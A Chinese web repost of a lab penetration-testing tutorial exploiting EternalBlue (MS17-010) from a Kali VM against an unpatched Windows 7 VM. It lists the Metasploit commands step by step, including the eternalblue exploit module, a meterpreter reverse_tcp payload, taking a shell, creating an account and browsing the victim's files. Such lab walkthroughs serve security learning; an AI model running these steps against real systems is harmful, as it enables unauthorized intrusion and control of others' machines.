首页 网络安全 渗透测试 查看内容

kail对永恒之蓝漏洞做渗透测试(ms17-010)

2019-3-2 15:58 |来自: 互联网 2213 0

摘要: 实验环境:首先先介绍ms17-0010 ms即微软。17代表2017年,010代表是第10个漏洞,即微软2017年的第10号漏洞kail虚拟机一台 ip地址:192.168.10.20kail 查看ip地址信息windows虚拟机一台 IP地址:192.168.10.80windows ...
关键词:漏洞 攻击 192.168 windows 地址 工具 metasploit 微软 代表 信息

实验环境:

首先先介绍ms17-0010 ms即微软。17代表2017年,010代表是第10个漏洞,即微软2017年的第10号漏洞

kail虚拟机一台 ip地址:192.168.10.20

kail 查看ip地址信息

windows虚拟机一台 IP地址:192.168.10.80

windows查看ip地址

(windows7未安装永恒之蓝ms17-010漏洞补丁)

kail中打开漏洞利用工具metasploit寻找漏洞

著名漏洞利用工具metasploit

打开metasploit

键入search ms17-010 寻找漏洞

搜索漏洞

use exploit/windows/smb/ms17_010_eternalblue 利用漏洞

利用漏洞

设置操作机ip和被攻击者ip

set rhost 192.168.10.80

set lhost 192.168.10.20

设置操作信息

安装一个tcp反向链接工具

set payload windows/x64/meterpreter/reverse_tcp

安装工具

执行run命令 进行攻击

执行攻击

当下方有WIN字样是代表攻击成功

执行shell拿取被攻击管理员Cmd权限

windows7被攻破拿到shell

非法创建用户

查看被攻击的文件信息

本文出处: https://www.toutiao.com/a6662137987268084231/
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部